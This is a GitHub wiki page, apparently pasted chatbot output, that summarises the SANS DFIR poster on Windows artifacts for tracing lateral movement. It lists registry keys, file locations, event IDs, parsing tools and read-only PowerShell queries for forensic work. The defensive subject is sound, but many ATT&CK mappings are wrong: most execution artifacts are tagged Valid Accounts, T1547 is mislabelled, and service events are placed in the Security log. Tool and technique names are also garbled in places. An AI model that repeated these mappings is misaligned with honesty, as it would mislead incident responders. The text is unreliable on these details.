SANS DFIR - ToddMaxey/Technical-Documentation GitHub Wiki

#SANS DFIR Poster

#Introducing the New SANS DFIR “Hunt Evil“ Poster - YourTube video

Here's the fully integrated and logically expanded document that combines both the original text and the additional data you provided, ensuring no omissions and seamless flow:

Understanding Lateral Movement and Artifact Analysis in Windows Systems

Lateral movement is critical in threat hunting and incident response. Attackers rely on this technique to stealthily shift from one system to another, gathering intelligence or escalating privileges. Detecting these movements requires understanding the tools, artifacts, and patterns typically associated with lateral movement. Each lateral movement technique can be mapped to specific MITRE ATT&CK techniques, allowing security analysts to better understand and respond to threats.

The FOR508 course offered by SANS equips digital forensic professionals with the tools and methodologies necessary for understanding and tracking these movements.

Key Lateral Movement Artifacts

1. RecentApps (Windows 10/11)

  • Description: Tracks program executions on Windows 10 systems.

  • Location: NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Search\RecentApps

  • Interpretation: Each entry references a recently executed application. Fields like AppID (application name), LastAccessTime (UTC), and LaunchCount (number of executions) help track recent program usage.

  • Access Method:

    • Registry Editor: Manually access the key by loading the user's NTUSER.DAT hive and navigating to:

      HKEY_USERS\<User_SID>\Software\Microsoft\Windows\CurrentVersion\Search\RecentApps

    • RegRipper: Automates registry parsing and pulls RecentApps data.

    • PowerShell:

      Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Search\RecentApps"

  • MITRE ATT&CK Reference:

    • T1078: Valid Accounts

2. Jump Lists (Windows 7-11)

  • Description: Jump Lists provide a mechanism for quick access to frequently or recently used files and tasks, including media files and application tasks.

  • Location: C:\%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations

  • Interpretation: Analyzing Jump Lists can reveal when a file or application was first and last accessed. The Creation Time shows when an item was added, while the Modification Time reflects the last modification date.

  • Access Method:

    • Jump List Explorer: A free tool for parsing and visualizing Jump List files.

    • FTK Imager: General forensic tool to image and extract Jump List data.

    • Hex Editors: For advanced users to manually inspect Jump List files.

  • MITRE ATT&CK Reference:

    • T1078: Valid Accounts

3. ShimCache (Application Compatibility Cache)

  • Description: Tracks executables run on the system and their last modified time, helping identify compatibility issues.

  • Location: SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache

  • Interpretation: ShimCache logs details about all executables run on a system, offering insight into when specific malware was executed.

  • Access Method:

    • ShimCacheParser: Parses ShimCache data.

    • Autoruns (Sysinternals): Displays compatibility cache information.

    • RegJump: Navigate to the relevant registry key.

    • Volatility: Extract live ShimCache information during memory analysis.

  • MITRE ATT&CK Reference:

    • T1078: Valid Accounts

4. Prefetch Files (Windows 7-11)

  • Description: Prefetch files improve system performance by preloading parts of commonly used applications.

  • Location: C:\Windows\Prefetch

  • Interpretation: Prefetch files provide details like last execution time, how many times an application has run, and accessed directories.

  • Access Method:

    • PECmd: A dedicated forensic tool for parsing Prefetch files.

    • FTK Imager: For imaging and extracting Prefetch files from disk.

    • Prefetch Parser: (Autopsy tool) for analyzing forensic details of Prefetch files.

  • MITRE ATT&CK Reference:

    • T1078: Valid Accounts

    • T1021: Remote Services

5. UserAssist (Windows 7-11)

  • Description: Tracks GUI-based programs launched from the desktop.

  • Location: NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count

  • Interpretation: All values are ROT13 encoded and provide insight into recently run programs.

  • Access Method:

    • RegRipper: Extracts and decodes UserAssist keys automatically.

    • Registry Viewer: Manual inspection of the registry.

    • PowerShell:

      Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count"

  • MITRE ATT&CK Reference:

    • T1078: Valid Accounts

6. BAM/DAM (Background Activity Moderator/Desktop Activity Moderator, Windows 10/11)

  • Description: BAM and DAM track executable activities in the background.

  • Location: HKLM\SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}

  • Interpretation: Logs the path of executables and their last execution time, identifying stealthy activities.

  • Access Method:

    • Registry Editor: Navigate to the relevant key.

    • RegRipper: Automatically parses BAM/DAM data.

    • PowerShell:

      Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}"

  • MITRE ATT&CK Reference:

    • T1078: Valid Accounts

7. Amcache.hve

  • Description: Stores data during process creation, including full path details of executed programs.

  • Location: C:\Windows\AppCompat\Programs\Amcache.hve

  • Interpretation: Amcache contains crucial information about every executable run on the system, including first run times, full paths, and SHA1 hashes.

  • Access Method:

    • Amcache Parser: Extracts Amcache hive data.

    • Registry Explorer: Direct navigation of the Amcache hive.

    • Manual Access: Navigate to C:\Windows\AppCompat\Programs\Amcache.hve.

  • MITRE ATT&CK Reference:

    • T1078: Valid Accounts

    • T1059.001: PowerShell

Artifacts Related to Remote Access and Execution

1. Security Event Logs (security.evtx)

  • Log Description: Logs user logon details, remote access attempts, and any activity involving alternate credentials.

  • Key Event IDs:

    • 4624: Logon Type 3 and Logon Type 10 (T1021: Remote Services, T1078: Valid Accounts)

    • 4648: Logon specifying alternate credentials (T1078: Valid Accounts)

    • 4672: Logon by a user with administrative rights (T1078: Valid Accounts)

    • 4697: Service installation (T1547: System Services)

    • 4768, 4769: Ticket-granting ticket (TGT) issued (T1558: Golden Ticket)

    • 4776: NTLM authentication (T1557: Man-in-the-Middle)

    • 4778/4779: Source IP and system name (RDP) (T1021.001: Remote Desktop Protocol)

    • 7034: Service crashed unexpectedly

    • 7035-7045: Service start/stop, installation, and configuration changes.

2. Remote Desktop Protocol (RDP) Artifacts

  • Log Description: Logs track Remote Desktop sessions and activities.

  • Key Event IDs:

    • 1024, 1102: RDP destination host name and IP (T1021.001: Remote Desktop Protocol)

    • 131, 98: Connection attempts and successful connections (T1021.001: Remote Desktop Protocol)

    • 1149, 21, 22, 41: Source IP and logon user name details.

3. Scheduled Tasks

  • Log Description: Attackers often use scheduled tasks for persistence or remote execution.

  • Key Event IDs:

    • 4698: Task created

    • 4699: Task deleted

    • 4702: Task updated

    • 106, 140, 141: Scheduled task execution/completion

  • MITRE ATT&CK Reference:

    • T1053: Scheduled Task/Job

4. Windows Management Instrumentation (WMI)

  • Log Description: WMI is commonly used for remote execution and persistence.

  • Key Event IDs:

    • 5857: Execution of WMI provider DLL

    • 5860, 5861: Registration of temporary and permanent event consumers

  • MITRE ATT&CK Reference:

    • **T1047: Windows Management Instrument

ation**

5. PsExec

  • Log Description: PsExec is a popular tool for remote code execution.

  • MITRE ATT&CK Reference:

    • T1569.002: System Services

6. PowerShell Remoting

  • Log Description: Tracks remote session creation and execution through PowerShell.

  • Key Event IDs:

    • 40961, 40962: Local initiation of PowerShell

    • 8193, 8194: Session created/closed

    • 4103, 4104: Script block logging

    • 53504: Authenticated user

  • MITRE ATT&CK Reference:

    • T1059.001: PowerShell

Comprehensive Artifact Investigation and Forensic Recommendations

  1. Memory Analysis: Memory analysis can uncover additional artifacts like command history and executable evidence. Dumping memory from processes like conhost.exe and searching for relevant strings can help recover command-line arguments and artifacts.

  2. Deep-Dive Analysis: Techniques like file carving, volume shadow copy analysis, and NTFS log analysis can help recover deleted files and logs tampered with by attackers.

  3. Process Monitoring: Continuous monitoring of critical system processes such as explorer.exe, lsass.exe, and services.exe is essential for identifying anomalies. Tools like Sysinternals Process Explorer or Autoruns (with TotalVirus integration) can identify abnormal behavior.

By combining these tools, methods, and Event IDs, forensic investigators and incident responders can effectively analyze and interpret data from a variety of Windows artifacts, providing a detailed understanding of lateral movement and malicious activities in the system.

⚠️ **GitHub.com Fallback** ⚠️